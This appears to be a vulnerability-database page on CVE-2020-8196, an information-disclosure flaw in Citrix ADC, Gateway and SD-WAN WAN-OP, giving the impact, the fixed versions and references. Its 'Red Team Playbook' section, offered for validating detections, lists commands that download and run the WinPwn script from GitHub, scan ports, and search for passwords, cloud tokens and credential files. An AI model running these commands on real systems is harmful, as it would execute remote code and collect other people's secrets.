CVE-2020-8196
Overview
The vulnerability is an improper access control flaw affecting Citrix ADC, Citrix Gateway, and Citrix SDWAN WAN-OP firmware versions prior to specified releases. The root cause lies in insufficient enforcement of privilege restrictions on certain internal functions, allowing low-privileged users to access resources or information that should be restricted. This improper validation occurs within the authentication and authorization mechanisms of the affected network appliance firmware components.
Vulnerability Description
Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 resulting in limited information disclosure to low privileged users.
Impact
An attacker with a low-privileged authenticated account can exploit this vulnerability to gain access to limited sensitive information that should be restricted, such as configuration details or diagnostic data. This unauthorized disclosure can aid in further reconnaissance or targeted attacks within the network environment. The exploitation requires valid low-level credentials but no elevated privileges or user interaction beyond authentication. The business consequence includes potential exposure of internal system data that could facilitate lateral movement or targeted exploitation.
Solution
Citrix has released fixed firmware versions addressing this improper access control issue: Citrix ADC and Citrix Gateway versions 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14, and 10.5-70.18, as well as Citrix SDWAN WAN-OP versions 11.1.1a, 11.0.3d, and 10.2.7. Administrators should upgrade to these or later versions as detailed in Citrix advisory CTX276688 (https://support.citrix.com/article/CTX276688). No specific workarounds are documented; patching is the recommended mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question arises from improper access control mechanisms within specific versions of Citrix Application Delivery Controller (ADC) and Citrix Gateway, as well as Citrix SD-WAN WAN-OP. This flaw allows low-privileged users to gain access to sensitive information that should be restricted. The affected systems fail to adequately enforce user permissions, leading to a situation where unauthorized access can occur. This misconfiguration can expose critical data, undermining the integrity and confidentiality of the information processed through these devices.
Attack vectors exploiting this vulnerability can vary, but they typically involve an attacker leveraging their low-privileged access to query or retrieve information that is not intended for their user role. For instance, an attacker could craft specific requests to the affected systems, potentially gaining insights into network configurations, user accounts, or other sensitive operational data. This exploitation could be executed remotely, making it particularly concerning for organizations that rely on these devices for secure application delivery and network management. The risk escalates if an attacker combines this access with other vulnerabilities or social engineering tactics to escalate their privileges further.
The real-world impact of this vulnerability can be significant, especially for organizations that depend on Citrix products for their critical operations. The unauthorized disclosure of sensitive information could lead to data breaches, regulatory non-compliance, and reputational damage. For example, if an attacker were to access user credentials or sensitive configuration details, they could potentially launch further attacks on the organization’s infrastructure. The business risk is compounded by the fact that many organizations utilize these products to facilitate remote work and secure access to applications, making them attractive targets for malicious actors.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular audits of user permissions and access controls are essential to ensure that only authorized personnel have access to sensitive information. Additionally, organizations should apply the latest patches and updates provided by Citrix to their ADC and Gateway products, as these updates often contain critical security enhancements that address known vulnerabilities. Intrusion detection systems can also be employed to monitor for unusual access patterns or unauthorized queries, providing an additional layer of security.
In conclusion, the improper access control in Citrix ADC, Gateway, and SD-WAN WAN-OP products poses a notable risk to organizations that utilize these technologies. The potential for information disclosure to low-privileged users can lead to serious security incidents if left unaddressed. By prioritizing detection, regular updates, and strict access control measures, organizations can significantly reduce their exposure to this vulnerability and enhance their overall security posture.
CVE-2020-8196 has recently been incorporated into the CISA Known Exploited Vulnerabilities (KEV) catalog, reflecting a formal recognition of its operational relevance within federal cybersecurity frameworks. Concurrently, the CVSS score for this vulnerability was updated from 0.0 to 4.3, aligning its severity with the potential impact of limited information disclosure to low-privileged users. Notably, the Exploit Prediction Scoring System (EPSS) now assigns this vulnerability a significant score exceeding 0.68, placing it within the top percentile for predicted exploitation likelihood. This shift indicates an increased probability that adversaries may leverage this flaw, despite the absence of new exploit details or observed active exploitation in our telemetry. For defenders, these developments underscore a heightened need for vigilance, as the vulnerability’s inclusion in the KEV catalog often correlates with prioritization in patch management and incident response workflows. The updated risk assessment elevates CVE-2020-8196 from a theoretical concern to a practical threat vector warranting closer monitoring, especially in environments utilizing affected Citrix ADC, Gateway, and SD-WAN WAN-OP versions. While no ransomware activity has been linked to this vulnerability to date, its growing exploitability potential suggests it could become a target in broader attack campaigns.
Affected Products (13)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Citrix | Application Delivery Controller Firmware | All |
cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Application Delivery Controller Firmware | All |
cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Application Delivery Controller Firmware | All |
cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Application Delivery Controller Firmware | All |
cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Application Delivery Controller Firmware | All |
cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Netscaler Gateway Firmware | All |
cpe:2.3:o:citrix:netscaler_gateway_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Netscaler Gateway Firmware | All |
cpe:2.3:o:citrix:netscaler_gateway_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Netscaler Gateway Firmware | All |
cpe:2.3:o:citrix:netscaler_gateway_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Netscaler Gateway Firmware | All |
cpe:2.3:o:citrix:netscaler_gateway_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Gateway Firmware | All |
cpe:2.3:o:citrix:gateway_firmware:*:*:*:*:*:*:*:*
|
|
|
Citrix | Sd-Wan Wanop | All |
cpe:2.3:o:citrix:sd-wan_wanop:*:*:*:*:*:*:*:*
|
|
|
Citrix | Sd-Wan Wanop | All |
cpe:2.3:o:citrix:sd-wan_wanop:*:*:*:*:*:*:*:*
|
|
|
Citrix | Sd-Wan Wanop | All |
cpe:2.3:o:citrix:sd-wan_wanop:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-8196 |
| support.citrix.com |
GitHub CVE
x_refsource_MISC
|
https://support.citrix.com/article/CTX276688 |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-8196 |